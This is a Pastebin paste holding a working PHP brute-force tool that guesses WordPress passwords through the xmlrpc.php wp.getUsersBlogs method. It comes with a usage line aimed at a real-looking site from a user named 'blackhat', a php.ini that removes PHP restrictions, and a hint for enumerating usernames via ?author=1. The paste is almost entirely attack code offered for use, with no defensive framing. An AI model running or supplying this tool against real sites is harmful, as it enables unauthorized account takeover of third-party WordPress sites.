Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Usage:
- [blackhat@fedora tmp]$ php -c ~/shellz/xmlrpcbrutewp/php.ini -f /tmp/brut.php admin /home/blackhat/Desktop/founds/1.txt http://verona.am/xmlrpc.php
- $ cat ~/shellz/xmlrpcbrutewp/php.ini
- safe_mode = off
- open_basedir=
- disable_functions=
- [blackhat@fedora ~]$ cat /tmp/brut.php
- <?php
- /*
- Wordpress xmlrpc Bruteforce tool
- Coded by AkaStep
- */
- error_reporting(0);
- ini_set('memory_limit', '6000M');
- set_time_limit(0);
- $usage='php -f script.php username luget.txt http://domain.adi/xmlrpc.php';
- $banner=chr(27) ."[42m" . str_repeat('#',60) . PHP_EOL . ' **************** WORDPRESS XMLRPC BRUTEFORCE TOOL **************' . PHP_EOL .
- ' ********************* Istifade qaydasi ********************'.
- PHP_EOL .$usage . PHP_EOL .
- ' ****************************************************'. PHP_EOL .
- 'Hint: VALID ISTIFADECI ADI: http://domain.adi/?author=1 GRAB ET ' . chr(27) . "[0m" .PHP_EOL ;
- $uname=$argv[1];
- $luget=$argv[2];
- $hedef=$argv[3];
- if(count($argv) < 4){ die(PHP_EOL . $banner . PHP_EOL);}
- echo $banner;
- $luget=file($luget) or die('Luget Fayli Aca bilmirem!');
- $i=NULL;
- foreach($luget as $pass)
- {
- $i++;
- $ch = curl_init();
- $curlConfig = array(
- CURLOPT_URL => $hedef,
- CURLOPT_POST => true,
- CURLOPT_RETURNTRANSFER => true,
- CURLOPT_TIMEOUT => 5,
- CURLOPT_USERAGENT => 'MSIE 8 GECKO 9 BRUTEFORCE TRY MOZILLA GECKO BLAH LINUX PENTEST',
- CURLOPT_POSTFIELDS => '<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>
- <string>' . $uname . '</string></value></param>
- <param><value><string>' . $pass . '</string></value></param></params>
- </methodCall>');
- curl_setopt_array($ch, $curlConfig);
- $result = curl_exec($ch);
- $massiv=explode(PHP_EOL,$result);
- $result0=str_ireplace(array('<value><string>',
- '</string></value>'),'',(string)$massiv[11]);
- //echo var_dump($massiv);
- if($i % 10==1) {
- echo chr(27) . "[43m" . ' HEDEF => ' . preg_replace('/[^A-Za-z0-9\.\\:\\/]/i','',(string)$hedef). chr(27) . "[0m" .PHP_EOL;
- }
- if(!stristr($result,'Incorrect username or password')) die(PHP_EOL .chr(27) . "[42m" . '=======> TAPILDI! Username: ' . $uname . ' PAROL => ' . $pass . ' ==> Saytdan cavab:[ ' .
- preg_replace('/[^A-Za-z]/i','',str_ireplace(array('<member><name>',
- '</name>','<value><boolean>','</boolean></value></member>'),'',(string)$massiv[7])) . ' ] ' . ' <======= ' . PHP_EOL . 'HEDEF: ' . $hedef. chr(27) . "[0m" .PHP_EOL);
- echo chr(27) . "[41m" . '[ ' . $i . ' ] USERNAME: ' . $uname . ' PAROL QISMINDE: ' . trim($pass) . ' ==> Saytdan cavab:[ ' . trim($result0) . ' ] ' . chr(27) . "[0m" . PHP_EOL ;
- curl_close($ch);
- }
- unset($pass);
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement